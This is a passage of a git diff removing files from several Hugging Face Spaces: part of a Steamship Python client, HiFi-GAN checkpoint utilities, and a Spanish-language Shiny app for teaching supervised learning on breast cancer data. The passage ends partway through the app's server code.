write the following to always get back the same package instance, no matter how many - times you run it, scoped into its own workspace: - - ```python - instance = Steamship.use('package-handle', 'instance-handle') - ``` - - One may also write: - - ```python - instance = Steamship.use('package-handle') # Instance will also be named `package-handle` - ``` - - If you wish to override the usage of a workspace named `instance_handle`, you can provide the `workspace_handle` - parameter. - """ - if instance_handle is None: - instance_handle = package_handle - kwargs["workspace"] = workspace_handle or instance_handle - client = Steamship(**kwargs) - return client._instance_use( - package_handle=package_handle, - instance_handle=instance_handle, - config=config, - version=version, - fetch_if_exists=fetch_if_exists, - ) - - def _instance_use( - self, - package_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: bool = True, - ) -> PackageInstance: - """Creates/loads an instance of package `package_handle`. - - The instance is named `instance_handle` and located in the workspace this client is anchored to. - If no `instance_handle` is provided, the default is `package_handle`. - """ - - if instance_handle is None: - if config is None: - instance_handle = package_handle - else: - instance_handle = f"{package_handle}-{hash_dict(config)}" - - return PackageInstance.create( - self, - package_handle=package_handle, - package_version_handle=version, - handle=instance_handle, - config=config, - fetch_if_exists=fetch_if_exists, - ) - - @staticmethod - def use_plugin( - plugin_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: bool = True, - workspace_handle: Optional[str] = None, - **kwargs, - ) -> PluginInstance: - """Creates/loads an instance of plugin `plugin_handle`. - - The instance is named `instance_handle` and located in the Workspace named `instance_handle`. - If no `instance_handle` is provided, the default is `plugin_handle`. - - For example, one may write the following to always get back the same plugin instance, no matter how many - times you run it, scoped into its own workspace: - - ```python - instance = Steamship.use_plugin('plugin-handle', 'instance-handle') - ``` - - One may also write: - - ```python - instance = Steamship.use('plugin-handle') # Instance will also be named `plugin-handle` - ``` - """ - if instance_handle is None: - instance_handle = plugin_handle - kwargs["workspace"] = workspace_handle or instance_handle - client = Steamship(**kwargs) - return client._instance_use_plugin( - plugin_handle=plugin_handle, - instance_handle=instance_handle, - config=config, - version=version, - fetch_if_exists=fetch_if_exists, - ) - - def use_skill( - self, - skill: Skill, - provider: Optional[Vendor] = None, - instance_handle: Optional[str] = None, - fetch_if_exists: Optional[bool] = True, - ) -> PluginInstance: - - if skill not in SKILL_TO_PROVIDER: - raise SteamshipError( - f"Unsupported skill provided. " - f"Use one of our supported skills: {','.join(SKILL_TO_PROVIDER)}" - ) - - if provider and provider not in SKILL_TO_PROVIDER[skill]: - raise SteamshipError( - f"The provider {provider} has no support for the skill {skill}." - f"Use one of the providers that support your skill: " - f"{','.join(SKILL_TO_PROVIDER[skill])}" - ) - - plugin_setup = ( - SKILL_TO_PROVIDER[skill][provider] - if provider - else list(SKILL_TO_PROVIDER[skill].values())[0] - ) - return self._instance_use_plugin( - plugin_handle=plugin_setup["plugin_handle"], - instance_handle=instance_handle, - config=plugin_setup["config"], - fetch_if_exists=fetch_if_exists, - ) - - def _instance_use_plugin( - self, - plugin_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: Optional[bool] = True, - ) -> PluginInstance: - """Creates/loads an instance of plugin `plugin_handle`. - - The instance is named `instance_handle` and located in the workspace this client is anchored to. - If no `instance_handle` is provided, the default is `plugin_handle`. - """ - - if instance_handle is None: - if config is None: - instance_handle = plugin_handle - else: - instance_handle = f"{plugin_handle}-{hash_dict(config)}" - - if plugin_handle in Steamship._PLUGIN_INSTANCE_SUBCLASS_OVERRIDES: - return Steamship._PLUGIN_INSTANCE_SUBCLASS_OVERRIDES[plugin_handle].create( - self, - plugin_handle=plugin_handle, - plugin_version_handle=version, - handle=instance_handle, - config=config, - fetch_if_exists=fetch_if_exists, - ) - - return PluginInstance.create( - self, - plugin_handle=plugin_handle, - plugin_version_handle=version, - handle=instance_handle, - config=config, - fetch_if_exists=fetch_if_exists, - ) - - def get_workspace(self) -> Workspace: - # We should probably add a hard-coded way to get this. The client in a Steamship Plugin/App comes - # pre-configured with an API key and the Workspace in which this client should be operating. - # This is a way to load the model object for that workspace. - logging.info( - f"get_workspace() called on client with config workspace {self.config.workspace_handle}/{self.config.workspace_id}" - ) - workspace = Workspace.get( - self, id_=self.config.workspace_id, handle=self.config.workspace_handle - ) - if not workspace: - logging.error("Unable to get workspace.") - raise SteamshipError( - message="Error while retrieving the Workspace associated with this client config.", - internal_message=f"workspace_id={self.config.workspace_id} workspace_handle={self.config.workspace_handle}", - ) - logging.info(f"Got workspace: {workspace.handle}/{workspace.id}") - return workspace diff --git a/spaces/JeffJing/ZookChatBot/steamship/data/package/__init__.py b/spaces/JeffJing/ZookChatBot/steamship/data/package/__init__.py deleted file mode 100644 index 8bffdef4441ff2a0f38bd576ad8af41447879dd7..0000000000000000000000000000000000000000 --- a/spaces/JeffJing/ZookChatBot/steamship/data/package/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -from .package import Package -from .package_instance import PackageInstance -from .package_version import PackageVersion - -__all__ = [ - "Package", - "PackageInstance", - "PackageVersion", -] diff --git a/spaces/Jikiwi/sovits-models/vdecoder/hifigan/utils.py b/spaces/Jikiwi/sovits-models/vdecoder/hifigan/utils.py deleted file mode 100644 index 9c93c996d3cc73c30d71c1fc47056e4230f35c0f..0000000000000000000000000000000000000000 --- a/spaces/Jikiwi/sovits-models/vdecoder/hifigan/utils.py +++ /dev/null @@ -1,68 +0,0 @@ -import glob -import os -import matplotlib -import torch -from torch.nn.utils import weight_norm -# matplotlib.use("Agg") -import matplotlib.pylab as plt - - -def plot_spectrogram(spectrogram): - fig, ax = plt.subplots(figsize=(10, 2)) - im = ax.imshow(spectrogram, aspect="auto", origin="lower", - interpolation='none') - plt.colorbar(im, ax=ax) - - fig.canvas.draw() - plt.close() - - return fig - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def apply_weight_norm(m): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - weight_norm(m) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def load_checkpoint(filepath, device): - assert os.path.isfile(filepath) - print("Loading '{}'".format(filepath)) - checkpoint_dict = torch.load(filepath, map_location=device) - print("Complete.") - return checkpoint_dict - - -def save_checkpoint(filepath, obj): - print("Saving checkpoint to {}".format(filepath)) - torch.save(obj, filepath) - print("Complete.") - - -def del_old_checkpoints(cp_dir, prefix, n_models=2): - pattern = os.path.join(cp_dir, prefix + '????????') - cp_list = glob.glob(pattern) # get checkpoint paths - cp_list = sorted(cp_list)# sort by iter - if len(cp_list) > n_models: # if more than n_models models are found - for cp in cp_list[:-n_models]:# delete the oldest models other than lastest n_models - open(cp, 'w').close()# empty file contents - os.unlink(cp)# delete file (move to trash when using Colab) - - -def scan_checkpoint(cp_dir, prefix): - pattern = os.path.join(cp_dir, prefix + '????????') - cp_list = glob.glob(pattern) - if len(cp_list) == 0: - return None - return sorted(cp_list)[-1] - diff --git a/spaces/Jorgerv97/Herramienta_interactiva_ensenyanza_tecnicas_aprendizaje_supervisado_salud/learningTool.py b/spaces/Jorgerv97/Herramienta_interactiva_ensenyanza_tecnicas_aprendizaje_supervisado_salud/learningTool.py deleted file mode 100644 index 6a94413b6c9cfe63ecc1d7f97d3b993821947c78..0000000000000000000000000000000000000000 --- a/spaces/Jorgerv97/Herramienta_interactiva_ensenyanza_tecnicas_aprendizaje_supervisado_salud/learningTool.py +++ /dev/null @@ -1,2774 +0,0 @@ -from shiny import reactive, render, ui, module -from shinywidgets import output_widget, render_widget - -import plotly.graph_objects as go -import plotly.express as px -from plotly.subplots import make_subplots - -from pathlib import Path -from PIL import Image - -import numpy as np -import pandas as pd -import math as math -import re -import matplotlib.pyplot as plt - -# Importar los algoritmos y modelss desde scikit learn: -from sklearn.model_selection import train_test_split -from sklearn.tree import DecisionTreeClassifier, plot_tree -from sklearn.ensemble import RandomForestClassifier -from sklearn.linear_model import LogisticRegression -from sklearn import metrics - -# Importar todos los paquetes de información, ui y warnings generados -from GeneralInfo.presentation import presentation_ui, presentation_server -from GeneralInfo.initialData import initial_data_1_ui, initial_data_2_ui -from GeneralInfo.observation import observation_1_ui -from GeneralInfo.cleaning import cleaning_1_ui, cleaning_2_ui, cleaning_extra_ui, cleaning_server -from GeneralInfo.correlation import correlation_1_ui, correlation_2_ui, correlation_server -from GeneralInfo.subsetSplit import subsetSplit_1_ui, subsetSplit_2_ui, subsetSplit_server - -from AlgorithmsInfo.decTreeInfo import decTree_def_ui, decTree_howTo_ui, decTree_performance_ui, decTree_server -from AlgorithmsInfo.sharedInfo import shared_varImp_ui, shared_conf_mat_metrics_ui, shared_fitting_ui, shared_tree_rep_info_ui, shared_algs_server -from AlgorithmsInfo.ranForestInfo import ranForest_def_ui, ranForest_howTo_ui, ranForest_performance_ui, ranForest_server -from AlgorithmsInfo.logRegInfo import logReg_def_ui, logReg_howTo_ui, logReg_performance_ui, logReg_server - -from UIMessages.warningsGeneral import correlation_warning_ui, warnings_general_server -from UIMessages.warningsAlgorithms import diagnosis_warning_ui, test_split_warning_ui, test_split_low_warning_ui, test_split_high_warning_ui, features_warning_ui, feat_imp_warning_ui, conf_matrix_warning_ui, warnings_algorithms_server - - - -################################## DATAFRAMES Y DICCIONARIOS ################################# - -# Datos del dataframe de Breast Cancer Data Winsconsin -infile = Path(__file__).parent / "data.csv" -original_df = pd.read_csv( infile ) -clean_df = original_df.copy() - -empty_column_dict = {} -all_column_dict = {} -for col in clean_df.columns: - if col != "diagnosis": - all_column_dict[col] = col -outcome_var='diagnosis' - -# Datos para Decision tree -dec_tree_feat_imp_df = pd.DataFrame() - -# Datos para Random Forest -ran_forest_feat_imp_df = pd.DataFrame() - -# Datos para Logistic regression -log_reg_feat_imp_df = pd.DataFrame() - -# Variable para visualizar subplots -subplot_cols_number = 4 - -# Paths para guardado de imágenes -decTree_image_folder = Path(Path(__file__).parent / 'DecTrees') -ranForest_image_folder = Path(Path(__file__).parent / 'RanForests') - - -############################################################################################## -############################################################################################## -####################################### MÓDULO DE UI ######################################### -############################################################################################## -############################################################################################## - -@module.ui -def learningTool_ui(): - return ui.div( - ui.panel_main( -############################# TÍTULO - PRESENTACIÓN ########################### - ui.panel_main( - {"id": "tool-intro"}, - ui.tags.h1("PRESENTACIÓN A LA HERRAMIENTA"), - presentation_ui("Presentation_Main"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - -#################################### DATOS INICIALES ########################### - ui.panel_main( - ui.tags.h3("NUESTROS DATOS"), - initial_data_1_ui("initial_data_1"), - width=12 - ), - ui.panel_main( - {"id": "original-table"}, - ui.div( - ui.input_switch("view_original_table", "¡Ver los datos originales!", width="50%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "original-table-types"}, - initial_data_2_ui("initial_data_2"), - ui.div( - ui.input_switch("view_original_table_types", "¡Ver los tipos de los datos originales!", width="50%"), - style="font-weight: bold;" - ), - width=12, style="padding-top:20px;" - ), - ui.panel_main( - ui.tags.hr(), - width=12, style="padding-top:10px;" - ), - -#################################### OBSERVACIÓN DE DATOS ########################### - ui.panel_main( - ui.tags.h3("OBSERVACIÓN DE DATOS"), - observation_1_ui("observation_1"), - width=12 - ), - ui.panel_main( - {"id": "data-observation-diagnosis"}, - ui.div( - ui.input_switch("view_diganosis_hist", "¡Ver la distribución de los datos según la variable diagnosis!", width="50%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:10px;"), - width=12 - ), - ui.panel_main( - {"id": "data-observation-general"}, - ui.input_select("dropKeyWordSelector", "Selecciona un grupo de características según su tipo de medida:", {"mean": "Grupo de medida de media (mean)", "worst": "Grupo de medida de peor/mayor (worst)", "se": "Grupo de medida de error estándar (se)"}, width="50%"), - ui.div( - ui.input_switch("view_general_hist", "¡Ver el grupo de características seleccionado en función de la variable de diagnosis!", width="70%"), - style="font-weight: bold;" - ), - width=12, - ), - ui.panel_main( - ui.tags.hr(), - width=12, style="padding-top:10px;" - ), - -#################################### LIMPIEZA DE DATOS ########################### - ui.panel_main( - ui.tags.h3("LIMPIEZA DE DATOS"), - cleaning_1_ui("cleaning_1"), - width=12 - ), - ui.panel_main( - {"id": "clean-convert-diagnosis"}, - ui.input_action_button("convert_diagnosis", "Transformar datos de la variable diagnosis"), - cleaning_2_ui("cleaning_2"), - ui.input_select("dropIdSelector", "Selecciona la columna a eliminar:", all_column_dict, width="40%"), - width=12 - ), - ui.panel_main( - {"id": "clean-drop-index"}, - ui.input_action_button("drop_selected_column_clean", "Eliminar columna seleccionada"), - width=12 - ), - ui.panel_main( - {"id": "clean-table"}, - ui.tags.p("Por último, podemos observar como han quedado nuestros datos tras realizar la limpieza." - , style="padding-right:50px; padding-top:20px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("view_clean_table", "¡Ver los datos limpios!", width="50%"), - style="font-weight: bold;" - ), - width=12, style="padding-top:30px;" - ), - ui.panel_main( - cleaning_extra_ui("cleaning_extra"), - width=12, style="padding-top:10px;" - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - -#################################### CORRELACIÓN ########################### - ui.panel_main( - correlation_1_ui("correlation_1"), - width=12 - ), - ui.panel_main( - correlation_2_ui("correlation_2"), - width=12 - ), - ui.panel_main( - {"id": "correlation"}, - ui.input_slider("maximum_correlation", "Máxima correlación:", min=0, max=1, value=0.7, step=0.01), - ui.input_action_button("drop_correlation", "Eliminar columnas con correlación superior a la seleccionada"), - ui.tags.p(style="padding-top:20px;"), - ui.div( - ui.input_switch("view_correlation", "¡Ver la correlación entre datos!", width="50%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - ui.tags.hr(), - width=12, style="padding-top:10px;" - ), - - -#################################### TABS DE ALGORITMOS ########################### - ui.panel_main( - ui.tags.h3("ALGORITMOS DE PREDICCIÓN"), - width=12, style="padding-bottom:10px;" - ), - ui.panel_main( - ui.tags.h5("División de los datos en conjuntos de entrenamiento y prueba"), - subsetSplit_1_ui("subset_1"), - width=12, - ), - ui.panel_main( - {"id": "test_split"}, - subsetSplit_2_ui("subset_2"), - ui.input_slider("test_split_value", "Tamaño del subconjunto de prueba:", min=0, max=1, value=0.2, step=0.01), - ui.input_action_button("make_test_split", "Divide los datos en subconjunto de entrenamiento y testeo"), - ui.tags.p("", style="padding-bottom:30px;"), - ui.tags.hr(), - width=12, style="padding-bottom:10px;" - ), - ui.navset_tab( - ############################################################## - ################ ÁRBOL DE DECISIÓN ########################### - ############################################################## - ui.nav( - "Árbol de decisión", - ui.tags.h3("Árbol de decisión", style="padding-top:20px;"), - ui.panel_main( - ui.tags.h5("¿Qué es un arbol de decisión?", style="padding-top:20px; padding-bottom:10px;"), - decTree_def_ui("decTree_1"), - width=12 - ), - ui.panel_main( - decTree_howTo_ui("decTree_1"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - width=12 - ), - ######### AD: AJUSTES, CARACTERÍSTICAS Y CREACIÓN ######### - ui.row( - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Ajustes:"), - ui.tags.hr(), - ui.input_select("dec_tree_criterion","Criterion", {"gini": "Gini (default)", "entropy": "Entropy", "log_loss": "Log_loss"}), - ui.input_select("dec_tree_splitter","Splitter", {"best": "Best (default)", "random": "Random"}), - ui.input_slider("dec_tree_max_depth", "Max Depth (0 = None / default)", 0, 32, 0, step=1), - ui.input_slider("dec_tree_min_samples_split", "Min samples split (default = 2)", 1, 6, 2, step=1), - ui.input_slider("dec_tree_min_samples_leaf", "Min samples leaf (default = 1)", 1, 5, 1, step=1), - ui.input_select("dec_tree_max_features","Max features", {"None": "None (default)", "sqrt": "Sqrt", "log2": "Log2"}), - ), - ), - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Características:"), - ui.tags.hr(), - ui.input_checkbox_group("dec_tree_features_sel", "", choices=all_column_dict, selected=list(all_column_dict)), - ), - ), - ui.column( - 6, - ui.panel_main( - {"id": "dec_tree_generator"}, - ui.tags.h5("¡Crea el modelo de predicción!", style="padding-bottom:10px;"), - ui.input_action_button("generate_decission_tree", "Generar el modelo de árbol de decisión"), - width=12 - ), - ui.panel_main( - {"id": "var_imp_dec_tree"}, - ui.tags.hr(), - ui.tags.h5("Importancia de las características para el modelo:"), - shared_varImp_ui("decTree_shared_1"), - ui.div( - ui.input_switch("view_variable_importance_dec_tree", "¡Ver la importancia de las características!", width="80%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "var_imp_slider_dec_tree"}, - ui.input_slider("minimum_importance_dec_tree", "Mínima importancia:", min=0, max=100, value=5.0, step=0.1), - ui.input_action_button("deselect_not_imp_vars_dec_tree", "Deseleccionar características poco importantes automáticamente"), - width=12 - ), - ), - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ######### AD: MATRIZ DE CONFUSIÓN ######### - ui.panel_main( - ui.tags.h5("Resultados del modelo: matriz de confusión y métricas básicas"), - shared_conf_mat_metrics_ui("decTree_shared_1", label="decTree"), - width=12 - ), - ui.panel_main( - {"id": "dec_tree_conf_matrix"}, - ui.tags.p("Puedes ver las matrices de confusión del modelo generado y sus métricas aquí:" - , style="padding-top:20px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("conf_mat_dec_tree_switch", "¡Ver la matriz de confusión del árbol de decisión generado!", width="60%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.row( - ui.column(6, - ui.panel_main( - {"id": "dec_tree_conf_matrix_train"}, - width=12 - ), - ), - ui.column(6, - ui.panel_main( - {"id": "dec_tree_conf_matrix_test"}, - width=12 - ), - ), - ), - ######### AD: RESULTADOS CON ENTRENAMIENTO Y TEST ######### - ui.row( - ui.column(6, - ui.tags.p("Resultados con los datos de entrenamiento:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("decision_tree_precision"), - ui.output_text_verbatim("decision_tree_recall"), - ui.output_text_verbatim("decision_tree_f1"), - ui.output_text_verbatim("decision_tree_accuracy"), - width=7 - ), - ), - ui.column(6, - ui.tags.p("Resultados con los datos de prueba:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("decision_tree_precision_test"), - ui.output_text_verbatim("decision_tree_recall_test"), - ui.output_text_verbatim("decision_tree_f1_test"), - ui.output_text_verbatim("decision_tree_accuracy_test"), - width=7 - ), - ), - style="padding-top:30px;" - ), - decTree_performance_ui("decTree_3"), - ui.panel_main( - shared_fitting_ui("decTree_shared_1", label="decTree"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ########## AD: REPRESENTACIÓN ÁRBOL ########## - ui.panel_main( - {"id": "dec_tree_view"}, - ui.tags.h5("Representación del árbol de decisión"), - ui.tags.p("Finalmente podemos ver la representación del árbol de decisión. Gracias a ella podemos ver como nuestro modelo elige si una instancia pertenece a una clase o a otra." - , style="padding-top:10px; padding-bottom:10px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("view_tree_dec_tree_switch", "¡Ver la representación del árbol de decisión generado!", width="60%"), - style="font-weight: bold;" - ), - width=12, style="padding-bottom:10px;" - ), - ui.panel_main( - shared_tree_rep_info_ui("decTree_shared_1", label="decTree"), - width=12, style="padding-bottom:40px;" - ), - ), - ############################################################## - ################ RANDOM FOREST ############################### - ############################################################## - ui.nav("Bosque aleatorio", - ui.tags.h3("Bosque aleatorio", style="padding-top:20px;"), - ui.panel_main( - ui.tags.h5("¿Qué es un bosque aleatorio?", style="padding-top:20px; padding-bottom:10px;"), - ranForest_def_ui("ranForest_1"), - width=12 - ), - ui.panel_main( - ranForest_howTo_ui("ranForest_1"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - width=12 - ), - ######### RF: AJUSTES, CARACTERÍSTICAS Y CREACIÓN ######### - ui.row( - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Ajustes:"), - ui.tags.hr(), - ui.input_slider("ran_forest_n_estimators", "Num Estimators (default = 100)", 1, 100, 10, step=1), - ui.input_select("ran_forest_criterion","Criterion", {"gini": "Gini (default)", "entropy": "Entropy", "log_loss": "Log_loss"}), - ui.input_slider("ran_forest_max_depth", "Max Depth (0 = None / default)", 0, 32, 0, step=1), - ui.input_slider("ran_forest_min_samples_split", "Min samples split (default = 2)", 1, 6, 2, step=1), - ui.input_slider("ran_forest_min_samples_leaf", "Min samples leaf (default = 1)", 1, 5, 1, step=1), - ui.input_select("ran_forest_max_features","Max features", {"None": "None (default)", "sqrt": "Sqrt", "log2": "Log2"}), - ), - ), - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Características:"), - ui.tags.hr(), - ui.input_checkbox_group("ran_forest_features_sel", "", choices=all_column_dict, selected=list(all_column_dict)), - ), - ), - ui.column( - 6, - ui.panel_main( - {"id": "ran_forest_generator"}, - ui.tags.h5("¡Crea el modelo de predicción!"), - ui.input_action_button("generate_random_forest", "Generar el modelo de bosque aleatorio"), - width=12 - ), - ui.panel_main( - {"id": "var_imp_ran_forest"}, - ui.tags.hr(), - ui.tags.h5("Importancia de las características para el modelo:"), - shared_varImp_ui("ranForest_shared_1"), - ui.div( - ui.input_switch("view_variable_importance_ran_forest", "¡Ver la importancia de las características!", width="80%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "var_imp_slider_ran_forest"}, - ui.input_slider("minimum_importance_ran_forest", "Mínima importancia:", min=0, max=100, value=5.0, step=0.1), - ui.input_action_button("deselect_not_imp_vars_ran_forest", "Deseleccionar características poco importantes automaticamente!"), - width=12 - ), - ), - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ######### RF: MATRIZ DE CONFUSIÓN ######### - ui.panel_main( - ui.tags.h5("Resultados del modelo: matriz de confusión y métricas básicas"), - shared_conf_mat_metrics_ui("ranForest_shared_1", label="ranForest"), - width=12 - ), - ui.panel_main( - {"id": "ran_forest_conf_matrix"}, - ui.tags.p("Puedes ver las matrices de confusión del modelo generado y sus métricas aquí:" - , style="padding-top:20px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("conf_mat_ran_forest_switch", "¡Ver la matriz de confusión del bosque aleatorio generado!", width="60%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.row( - ui.column(6, - ui.panel_main( - {"id": "ran_forest_conf_matrix_train"}, - width=12 - ), - ), - ui.column(6, - ui.panel_main( - {"id": "ran_forest_conf_matrix_test"}, - width=12 - ), - ), - ), - ######### RF: RESULTADOS CON ENTRENAMIENTO Y TEST ######### - ui.row( - ui.column(6, - ui.tags.p("Resultados con los datos de entrenamiento:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("random_forest_precision"), - ui.output_text_verbatim("random_forest_recall"), - ui.output_text_verbatim("random_forest_f1"), - ui.output_text_verbatim("random_forest_accuracy"), - width=7 - ), - ), - ui.column(6, - ui.tags.p("Resultados con los datos de prueba:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("random_forest_precision_test"), - ui.output_text_verbatim("random_forest_recall_test"), - ui.output_text_verbatim("random_forest_f1_test"), - ui.output_text_verbatim("random_forest_accuracy_test"), - width=7 - ), - ), - style="padding-top:30px;" - ), - ranForest_performance_ui("ranForest_3"), - ui.panel_main( - shared_fitting_ui("ranForest_shared_1", label="ranForest"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - ui.tags.hr(), - width=12 - ), - ########## RF: REPRESENTACIÓN ÁRBOL ########## - ui.panel_main( - {"id": "ran_forest_view"}, - ui.tags.h5("Representación de los árboles"), - ui.tags.p("Un bosque aleatorio está formado por múltiples árboles de decisión. A continuación puedes ver los 5 primeros como máximo."), - ui.input_select("view_tree_ran_forest_number", "Selecciona el árbol que quieres mostrar", empty_column_dict), - ui.div( - ui.input_switch("view_tree_ran_forest_switch", "¡Ver la representación de los árboles de decisión generados!", width="60%"), - style="font-weight: bold;" - ), - width=12, style="padding-bottom:10px;" - ), - ui.panel_main( - shared_tree_rep_info_ui("ranForest_shared_1", label="ranForest"), - width=12, style="padding-bottom:40px;" - ), - ), - ############################################################## - ################ REGRESIÓN LOGÍSTICA ######################### - ############################################################## - ui.nav("Regresión logística", - ui.tags.h3("Regresión logística", style="padding-top:20px;"), - ui.panel_main( - ui.tags.h5("¿Qué es una regresión logística?", style="padding-top:20px; padding-bottom:10px;"), - logReg_def_ui("logReg_1"), - width=12 - ), - ui.panel_main( - logReg_howTo_ui("logReg_1"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:20px;"), - width=12 - ), - ######### RL: AJUSTES, CARACTERÍSTICAS Y CREACIÓN ######### - ui.row( - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Ajustes:"), - ui.tags.hr(), - ui.input_select("log_reg_solver","Solver", {"lbfgs": "Lbfgs (default)", "liblinear": "Liblinear", "newton-cg": "Newton-cg", "newton-cholesky": "Newton-cholesky", "sag": "Sag", "saga": "Saga"}, selected="lbfgs"), - ui.input_select("log_reg_penalty","Penalty", {"l2": "L2 (default)", "None": "None"}, selected="l2"), - ui.input_slider("log_reg_tol", "Tolerance (default = 1e-4) - 1e(valor seleccionado)", -10, 0, -4, step=1), - ui.input_slider("log_reg_c", "C (default = 1)", 1, 3000, 1, step=1), - ui.input_slider("log_reg_max_iter", "Max iterations (default = 100)", 100, 5000, 100, step=10), - ), - ), - ui.column( - 3, - ui.panel_well( - ui.tags.h5("Características:"), - ui.tags.hr(), - ui.input_checkbox_group("log_reg_features_sel", "", choices=all_column_dict, selected=list(all_column_dict)), - ), - ), - ui.column( - 6, - ui.panel_main( - {"id": "log_reg_generator"}, - ui.tags.h5("¡Crea el modelo de predicción!"), - ui.input_action_button("generate_logistic_regression", "Generar el modelo de Regresión logística"), - width=12 - ), - ui.panel_main( - {"id": "var_imp_log_reg"}, - ui.tags.hr(), - ui.tags.h5("Importancia de las características para el modelo:"), - shared_varImp_ui("logReg_shared_1"), - ui.div( - ui.input_switch("view_variable_importance_log_reg", "¡Ver la importancia de las características!", width="80%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.panel_main( - {"id": "var_imp_slider_log_reg"}, - ui.input_slider("minimum_importance_log_reg", "Mínima importancia:", min=0, max=100, value=5.0, step=0.1), - ui.input_action_button("deselect_not_imp_vars_log_reg", "Deseleccionar características poco importantes automaticamente"), - width=12 - ), - ), - ), - ui.panel_main( - ui.tags.p(style="padding-bottom: 20px"), - ui.tags.hr(), - width=12 - ), - ######### RL: MATRIZ DE CONFUSIÓN ######### - ui.panel_main( - ui.tags.h5("Resultados del modelo: matriz de confusión y métricas básicas"), - shared_conf_mat_metrics_ui("logReg_shared_1", label="logReg"), - width=12 - ), - ui.panel_main( - {"id": "log_reg_conf_matrix"}, - ui.tags.p("Puedes ver las matrices de confusión del modelo generado y sus métricas aquí:" - , style="padding-top:20px; padding-right:50px; text-align: justify; text-justify: inter-word;"), - ui.div( - ui.input_switch("conf_mat_log_reg_switch", "¡Ver la matriz de confusión de la regresión logística generada!", width="60%"), - style="font-weight: bold;" - ), - width=12 - ), - ui.row( - ui.column(6, - ui.panel_main( - {"id": "log_reg_conf_matrix_train"}, - width=12 - ), - ), - ui.column(6, - ui.panel_main( - {"id": "log_reg_conf_matrix_test"}, - width=12 - ), - ), - ), - ######### RL: RESULTADOS CON ENTRENAMIENTO Y TEST ######### - ui.row( - ui.column(6, - ui.tags.p("Resultados con los datos de entrenamiento:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("logistic_regression_precision"), - ui.output_text_verbatim("logistic_regression_recall"), - ui.output_text_verbatim("logistic_regression_f1"), - ui.output_text_verbatim("logistic_regression_accuracy"), - width=7 - ), - ), - ui.column(6, - ui.tags.p("Resultados con los datos de prueba:", style="font-weight: bold;"), - ui.panel_main( - ui.output_text_verbatim("logistic_regression_precision_test"), - ui.output_text_verbatim("logistic_regression_recall_test"), - ui.output_text_verbatim("logistic_regression_f1_test"), - ui.output_text_verbatim("logistic_regression_accuracy_test"), - width=7 - ), - ), - style="padding-top:30px;" - ), - logReg_performance_ui("logReg_3"), - ui.panel_main( - shared_fitting_ui("logReg_shared_1", label="logReg"), - width=12 - ), - ui.panel_main( - ui.tags.p(style="padding-bottom:40px;"), - width=12 - ), - ), - ), - -####################### RESET DATAFRAME LIMPIA ############################# - ui.panel_main( - ui.tags.hr(), - ui.tags.h3("¿LA BASE DE DATOS LIMPIA YA NO SIRVE?", style="padding-top:10px;"), - ui.tags.p("Si has eliminado demasiadas columnas, te has equivocado o simplemente quieres volver a empezar... ¡Restablece aquí la base de datos limpia!", style="padding-top:10px;"), - ui.input_action_button("reset_clean_df", "Restablece los datos limpios"), - width=12, style="padding-top:10px; padding-bottom:50px;" - ), - width=12 - ), - ) - - - -############################################################################################## -############################################################################################## -#################################### MÓDULO DE SERVIDOR ###################################### -############################################################################################## -############################################################################################## - -@module.server -def learningTool_server(input, output, session): - -################# VARIABLES REACTIVAS Y DE CONTROL DE LA HERRAMIENTA ######################### - - #Controles generales: - diagnosis_data_converted = reactive.Value(False) - correlation_execution_counter = reactive.Value(0) - test_split_done = reactive.Value(False) - reset_dataframe_counter = reactive.Value(0) - - #Decision Tree: - decision_tree_execution_counter = reactive.Value(0) - - accuracy_decTree = reactive.Value(-1) - recall_decTree = reactive.Value(-1) - precision_decTree = reactive.Value(-1) - 